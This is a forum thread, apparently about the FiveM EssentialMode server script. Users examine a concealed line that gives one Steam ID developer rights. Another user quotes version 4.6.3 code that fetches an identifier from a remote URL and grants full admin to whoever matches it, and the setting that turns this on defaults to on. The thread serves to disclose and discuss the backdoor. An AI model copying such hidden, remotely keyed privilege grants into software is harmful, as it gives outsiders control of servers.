Hi,
Been having a poke through the code, and I found this which I don’t understand. What does it do?
if identifier=="stea".."m:110000106f3226c"then self.group = "_dev"; self.permission_level=20 end
The ‘steam’ id relates back to this profile https://steamidfinder.com/lookup/76561198076863084/
What is it?
Looks a bit odd to me too, would like clarification
This does look a little odd - Looks like it is giving a specific Steam ID extra permissions?!
The concatination in between ‘stea’ and ‘m’ is whats confusing me! Is it a typo?
Looks like someone is trying to obfuscate the ID in the code?
I think i will go through the back
Yeh, who is Kanersps?
The creator of Essentialmode
I was joking btw, but if it links back to his profile it’s clearly just a group for him in-game. Not sure what type of permissions it gives him but. Maybe have a much thorough look.
Yeah, it seems that any server that users essentialmode will be vulnerable as Kanersps can come onto the server and immediately be a super admin.
Worse, it appears this was hidden well away in the file.
lol @ you guys crying about nothing.
HELP MY COPY PASTA SCRIPT IS COMPRIMISED
There’s no need to get your pitchforks everyone. I don’t know what version of EssentialMode you’re using but that line isn’t in any of my files. Anyways to explain - in short - what it is it’s a line of code that grants Kanersps a developer role. On my version (4.6.3) it’s only active if you have es_enableDevTools 1 in your server.cfg. Also when you (Squibsie) say hidden, it implies that you can’t or aren’t supposed to find it, but anything can be found if you’re looking for it.
So in short, the script is not vulnerable, nor compromised.
Why put … in steam?
So people who weren’t looking for it wouldn’t find it and immediately scream “Oh it’s a backdoor, quick hide the children”.
(This is an educated guess, as I am not Kanersps I can not give you a full explanation.)
Russian hackers trying to frame Kanersps obviously.
False this is the code in 4.6.3
if GetConvar("es_enableDevTools", "1") == "1" then
PerformHttpRequest("http://fivem.online/id.txt", function(err, rText, headers)
if self.identifier == rText then
self.group = "_dev"
self.permission_level = 20
end
end)
end
So you are not compromised only if you set es_enableDevTools to another value and since everyone don’t set the value it’s “1” by default which activate this “backdoor”.
Don’t know the intention behind it but it’s certainly discutable
By saying “I don’t know what version of EssentialMode you’re using but that line isn’t in any of my files.” I meant this wasn’t present:
if identifier=="stea".."m:110000106f3226c"then self.group = "_dev"; self.permission_level=20 end
In version 4.6.3 that code (you listed) is present, as I mentioned above, and what I quoted below (now that you point it out is incorrect). It is defaulted to “1”, which could either be a mistake or intentional but to be completely honest I’m not worried about it, if you are you can always toggle it to 0 in your server.cfg.
It’s still a backdoor that is enabled by default and not explained anywhere in the documentation, also if you check the group class having the group _dev allows every right.
I agree with you we cannot know if it’s a mistake or intentional, my guess is that it’s just for support.
However as i said it’s still a backdoor and people should be aware of it. Trusting or not trusting the author is matter of subjectivity.
I agree with you that it should probably be mentioned in the documentation somewhere. It’s more than likely used for debugging / support, again that is an educated guess. And I’ll go back to my point above, if anyone wants to toggle this off because they feel “vulnerable” or “compromised” they can add set es_enableDevTools 0 in their server.cfg to toggle it off.